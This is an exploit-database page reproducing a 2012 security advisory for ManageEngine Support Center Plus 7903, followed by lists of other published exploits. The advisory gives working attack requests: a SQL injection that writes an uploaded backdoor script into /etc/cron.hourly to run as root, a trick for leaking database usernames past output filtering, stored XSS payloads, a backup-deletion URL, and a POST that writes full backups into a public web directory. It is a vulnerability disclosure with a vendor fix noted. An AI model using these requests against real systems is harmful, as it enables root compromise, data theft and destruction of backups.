Menu

Search for hundreds of thousands of exploits

"ManageEngine Support Center Plus 7903 - Multiple Vulnerabilities"

Author

Exploit author

xistence

Platform

Exploit platform

multiple

Release date

Exploit published date

2012-04-15

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
_______         _______  _______             __ 
 |   _   |.--.--.|   _   ||   _   |    .-----.|  |
 |.  |   ||_   _||   |   ||.  |   | __ |     ||  |
 |.  |   ||__.__| \___   ||.  |   ||__||__|__||__|
 |:  1   |       |:  1   ||:  1   |               
 |::.. . |       |::.. . ||::.. . |               
 `-------'       `-------'`-------'               
                                                  
+--------------------------------------------------------------------------------------------------------------------------------+
| Exploit Title     : ManageEngine Support Center Plus <=7903 Multiple Vulnerabilities
| Date              : 15-04-2012
| Author            : Robert 'xistence' van Hamburg (xistence<[AT]>0x90.nl
| Software link SP  : http://www.manageengine.com/products/support-center/64045241/ManageEngine_SupportCenter_Plus_7_9_0_SP-0_3_0.ppm
| Vendor site       : http://www.manageengine.com/products/support-center/
| Version           : 7903 and lower
| Tested on         : CentOS 5 Linux (Windows version also vulnerable, although untested)
|
| Vendor Notified	: 24-08-2011
| Vendor Fixed		: 05-01-2012
| Fixed version		: 7905 - latest = 7908
+--------------------------------------------------------------------------------------------------------------------------------+


+--------------------------------------------------------------------------------------------------------------------------------+
| 0x01 - SQL Injection in Row Count
+--------------------------------------------------------------------------------------------------------------------------------+

Normally when you click on the row count the following POST request is executed:

POST /servlet/AJaxServlet?action=getWorkOrderCount HTTP/1.1
Host: supportcenter:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://supportcenter:8080/WOListView.do?viewName=All_Requester
Content-Length: 2062
Cookie: JSESSIONID=8C712F3C4F909CB5ABE4B2E9E688C55D; 2RequestsshowThreadedReq=showThreadedReqshow;
	2RequestshideThreadedReq=hideThreadedReqhide; JSESSIONIDSSO=5E58C910F58B97EF3776124641E4C4CC; PREV_CONTEXT_PATH=/custom
Pragma: no-cache
Cache-Control: no-cache

countSql=select%20count(*)%20from%20workorder%20wo%20left%20join%20workorder_fields%20wof%20on%20wo.workorderid%3Dwof.workorderid%20left%20join%20workorder_product%20on%20wo.workorderid%3Dworkorder_product.workorderid%20left%20join%20componentdefinition%20on%20workorder_product.product_id%3Dcomponentdefinition.componentid%20inner%20join%20workorderstates%20wos%20on%20wo.workorderid%3Dwos.workorderid%20left%20join%20categorydefinition%20cd%20on%20wos.categoryid%3Dcd.categoryid%20left%20join%20subcategorydefinition%20scd%20on%20wos.subcategoryid%3Dscd.subcategoryid%20left%20join%20aaauser%20aau%20on%20wo.requesterid%3Daau.user_id%20left%20join%20aaauser%20ti%20on%20wos.ownerid%3Dti.user_id%20left%20join%20statusdefinition%20std%20on%20wos.statusid%3Dstd.statusid%20left%20join%20departmentdefinition%20dpt%20on%20wo.deptid%3Ddpt.deptid%20left%20join%20workorder_account%20woacc%20on%20wo.workorderid%3Dwoacc.workorderid%20left%20join%20aaausercontactinfo%20user_contact%20on%20aau.user_id%3Duser_contact.user_id%20left%20join%20aaacontactinfo%20rcontact%20on%20user_contact.contactinfo_id%3Drcontact.contactinfo_id%20left%20join%20leveldefinition%20lvd%20on%20wos.levelid%3Dlvd.levelid%20left%20join%20prioritydefinition%20pd%20on%20wos.priorityid%3Dpd.priorityid%20left%20join%20modedefinition%20mdd%20on%20wo.modeid%3Dmdd.modeid%20left%20join%20aaausercontactinfo%20auci1%20on%20aau.user_id%3Dauci1.user_id%20left%20join%20aaacontactinfo%20aci1%20on%20auci1.contactinfo_id%3Daci1.contactinfo_id%20left%20join%20workorder_queue%20wo_queue%20on%20wo.workorderid%3Dwo_queue.workorderid%20left%20join%20queuedefinition%20queue%20on%20wo_queue.queueid%3Dqueue.queueid%20left%20join%20sduser%20crd%20on%20wo.createdbyid%3Dcrd.userid%20left%20join%20aaauser%20cri%20on%20crd.userid%3Dcri.user_id%20left%20join%20aaaorganization%20org%20on%20woacc.accountid%3Dorg.org_id%20left%20join%20aaaorganization%20sorg%20on%20woacc.subaccountid%3Dsorg.org_id%20where%20%20((aau.user_id%20%3D%202)%20and%20((wo.isparent%20%3D%20'1')%20and%20(wo.departmentid%20%3D%201)))

File access as root:
As you see, you can put a normal MySQL query in the countSql parameter.
However, I found out there is some input and output validation in place. It's not possible to use a "CREATE", or "INSERT" query. SELECT however is possible.
This still makes it possible to use the following trick:

Add an attachment to a (new) ticket, like a "backdoor.sh" and press attach. BUT DO NOT PRESS "DONE"! Keep the window open. The file will be in a temporary directory now. (/ManageEngine/SupportCenter/bin/Attachments/Request/<YOURUSERID>/)

Now send a POST request with:

countSql=select load_file("../../bin/Attachments/Request/<YOURUSERID>/backdoor.sh") into dumpfile "/etc/cron.hourly/backdoor.sh";

Which creates the backdoor.sh file in /etc/cron.hourly.

Above is a blind SQL injection, as you won't see the results in your browser.
Extra note: "grant" is possible too, so you could add any user or change permissions.


IDS/Output validation bypass:

After some testing I found out it's only possible to get numeric responses back in the web browser. So you can't read usernames/md5 hashes directly from the database. However, it's still possible to bypass this "protection":

We can send a query that retrieves the username of user_id =2 from the aaauser table, convert it to hex (base 16) and then convert it to base 10:
countSql=select conv(hex(first_name),16,10) from aaauser where user_id = 2;

This will give the following result:

444351214452

Now in any local MySQL instance you can convert that back to hex (base 16) and unhex it:

mysql> select unhex(conv('444351214452', 10, 16));
+-------------------------------------+
| unhex(conv('444351214452', 10, 16)) |
+-------------------------------------+
| guest                               |
+-------------------------------------+


+--------------------------------------------------------------------------------------------------------------------------------+
| 0x02 - Stored XSS vulnerability as anonymous user
+--------------------------------------------------------------------------------------------------------------------------------+

XSS/Cross Site Scripting vulnerability as anonymous user:
http://support:8080/sd/Request.sd
Vulnerable input fields are: Name, Message
Input: <script>alert('Hello World')</script>

E-mail: my-email@test'<script>alert('Hello World')</script>


+--------------------------------------------------------------------------------------------------------------------------------+
| 0x03 - Stored XSS vulnerabilities as ANY authenticated user - user details
+--------------------------------------------------------------------------------------------------------------------------------+

Possible by browsing to this url and fill in the form fields
http://support:8080/RequesterDef.do?mode=edit&id=2 (id of the current user)
Vulnerable input fields are: Name, Twitter Screen Name, Job Title

Input: <script>alert('Hello World')</script>

+--------------------------------------------------------------------------------------------------------------------------------+
| 0x04 - Stored XSS vulnerabilities as ANY authenticated user - ticket
+--------------------------------------------------------------------------------------------------------------------------------+

Create a new request through the website with the http://<SUPPORTCENTER>:8080/WorkOrder.do url as any user. Enter any subject and select Plain Text on the description. Enter <script>alert("Hello World")</script> in the description field. Press "Add Request".

Now when you browse to the http://<SUPPORTCENTER>:8080/WOListView.do and click on the ticket you just created you'll receive a popup which says "Hello World", which makes it possible to put stored javascript/html code inside the description.

POST a new request (below are the headers to exploit this)
POST /WorkOrder.do HTTP/1.1
Host: support:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://support:8080/WorkOrder.do
Cookie: JSESSIONID=75291FED727C1BCA5CD2F5A46AA97071; PREV_CONTEXT_PATH=; JSESSIONIDSSO=BA4D299A5FCBAB586F462AED5A730D67
Content-Type: application/x-www-form-urlencoded
Content-Length: 322

PARAMETERS: reqTemplate=&prodId=0&priority=2&reqID=2&usertypename=Requester&reqName=guest&category=1&item=0&subCategory=0&title=Test&description=%3Cbr+%2F%3E%3Cscript%3Ealert%28%27Hello+World%27%29%3C%2Fscript%3E&MOD_IND=WorkOrder&FORMNAME=WorkOrderForm&attach=&attPath=&component=Request&attSize=&attachments=&autoCCList=&addWO=addWO


+--------------------------------------------------------------------------------------------------------------------------------+
| 0x05 - Delete Support Center Plus Backups as ANY authenticated user
+--------------------------------------------------------------------------------------------------------------------------------+

Delete Support Center Plus Backups as ANY authenticated user
Change the ids= to delete other backups
http://support:8080/BackupSchedule.do?module=delete_backup&backup_ids=<ID>


+--------------------------------------------------------------------------------------------------------------------------------+
| 0x06 - Create a Backup schedule as ANY authenticated user and write the backup file to a public accessible  directory
+--------------------------------------------------------------------------------------------------------------------------------+

Create a Backup schedule as ANY authenticated user and write backup file to a public access directory
Below are the headers to create a backup schedule on 2011-08-24 13:10. After this has been done, it's possible to download
the Support Center Plus backup file at http://support:8080/inlineimages/backup_supportcenter_7901_fullbackup_08_24_2011_13_10.data
For this you only need to know the version of the support center and the date/time (which we set our selfs in the POST)

POST /BackupSchedule.do HTTP/1.1
Host: support:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://support:8080/AdminHome.do
Cookie: JSESSIONID=001CFC62780059CC1FC04ADA6CF7347D; PREV_CONTEXT_PATH=; fromPortal=customerportal; JSESSIONIDSSO=57D961350A26A1D9D8C70AFA6E10760E
DNT: 1
Pragma: no-cache
Cache-Control: no-cache

PARAMETERS module=save_schedule&days=1&backupStartDate=2011-08-24&hours=13&minutes=10&backupType=fullbackup&backupstatus=enabled&backupLocation=..%2Finlineimages%2F
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2015-10-05 "ManageEngine ServiceDesk Plus 9.1 build 9110 - Directory Traversal" webapps jsp xistence
2015-09-14 "ManageEngine OpManager 11.5 - Multiple Vulnerabilities" webapps multiple xistence
2015-09-14 "ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution" webapps multiple xistence
2014-03-19 "Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 - Multiple Vulnerabilities" webapps hardware xistence
2014-03-19 "Quantum vmPRO 3.1.2 - Local Privilege Escalation" local hardware xistence
2014-03-19 "Loadbalancer.org Enterprise VA 7.5.2 - Static SSH Key" remote unix xistence
2014-03-19 "Quantum DXi V1000 2.2.1 - Static SSH Key" remote unix xistence
2014-02-05 "Pandora Fms 5.0RC1 - Remote Command Injection" webapps php xistence
2014-01-29 "ManageEngine Support Center Plus 7916 - Directory Traversal" webapps php xistence
2014-01-29 "A10 Networks Loadbalancer - Directory Traversal" webapps hardware xistence
2013-10-04 "Aanval 7.1 build 70151 - Multiple Vulnerabilities" webapps php xistence
2013-09-20 "OpenEMR 4.1.1 Patch 14 - SQL Injection / Privilege Escalation / Remote Code Execution (Metasploit)" remote php xistence
2013-09-20 "Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit)" remote php xistence
2013-09-17 "Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities" webapps php xistence
2013-09-17 "OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities" webapps php xistence
2013-09-03 "TP-Link TD-W8951ND - Multiple Vulnerabilities" webapps hardware xistence
2013-07-25 "Alienvault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities" webapps php xistence
2013-06-26 "Motion - Multiple Vulnerabilities" remote multiple xistence
2013-01-02 "Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Command Execution" webapps php xistence
2013-01-02 "Astium VoIP PBX 2.1 build 25399 - Remote Crash (PoC)" dos linux xistence
2012-12-29 "Ubiquiti AirOS 5.5.2 - (Authenticated) Remote Command Execution" remote hardware xistence
2012-12-21 "YeaLink IP Phone SIP-TxxP Firmware 9.70.0.100 - Multiple Vulnerabilities" webapps hardware xistence
2012-10-19 "ManageEngine Security Manager Plus 5.5 build 5505 - Remote Root/SYSTEM SQL Injection" remote multiple xistence
2012-10-19 "ManageEngine Security Manager Plus 5.5 build 5505 - Directory Traversal" webapps multiple xistence
2012-10-19 "ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM SQL Injection (Metasploit)" remote windows xistence
2012-10-17 "ManageEngine Support Center Plus 7908 - Multiple Vulnerabilities" webapps jsp xistence
2012-04-15 "ManageEngine Support Center Plus 7903 - Multiple Vulnerabilities" webapps multiple xistence
2011-06-23 "ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal" webapps jsp xistence 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected